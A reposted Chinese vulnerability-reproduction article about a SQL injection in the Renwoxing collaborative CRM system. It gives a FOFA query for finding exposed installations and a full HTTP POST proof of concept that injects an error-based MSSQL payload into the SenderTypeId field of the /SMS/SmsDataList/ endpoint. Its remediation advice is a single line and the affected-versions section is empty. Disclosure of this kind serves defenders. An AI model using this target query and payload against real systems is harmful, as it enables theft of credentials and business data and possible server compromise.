任我行协同CRM系统SQL注入漏洞附POC

admin 2026-03-27 03:18:08 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文披露任我行协同CRM系统存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息甚至控制服务器。文章提供了FOFA资产测绘语法及详细的POC验证代码,展示了针对/SMS/SmsDataList/接口的报错注入利用方式。最后建议用户升级至最新版本进行修复,提醒读者合法合规使用相关技术。 综合评分: 78 文章分类: 漏洞POC,漏洞分析,WEB安全


cover_image

任我行协同CRM系统SQL注入漏洞 附POC

安服仔 安服仔

北风漏洞复现文库

2026年3月18日 09:56 广东

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

#

#

01

漏洞名称

任我行协同CRM系统SQL注入漏洞

#

02

影响版本

03

漏洞简介

我行协同CRM系统是一款集客户关系管理、办公自动化、目标管理、人力资源管理和知识管理于一体的集成化企业管理软件,旨在帮助企业实现数字化、协同化的运营管理。任我行协同CRM系统以客户为管理核心,通过业务管理标准化、工作模式标准化、文化建设标准化、知识体系标准化,四大维度,重构企业运营逻辑,助力企业实现管理升级与价值跃迁。攻击者可通过构造恶意SQL语句,注入并执行非预期的数据库操作,从而获取敏感信息(如用户账号、密码、业务数据等),甚至可能控制服务器。

04

资产测绘

title="欢迎使用任我行CRM"

05

漏洞复现

POC

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1Host: XXX.XXX.XXXConnection: closeCache-Control: max-age=0sec-ch-ua:"Not:A-Brand";v="99", "Google Chrome";v="145","Chromium";v="145"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 170  Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND'CvNI'='CvNI

06

修复建议

升级至最新版本

07

往期回顾


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:北风漏洞复现文库 安服仔 安服仔《任我行协同CRM系统SQL注入漏洞 附POC》

评论:0   参与:  0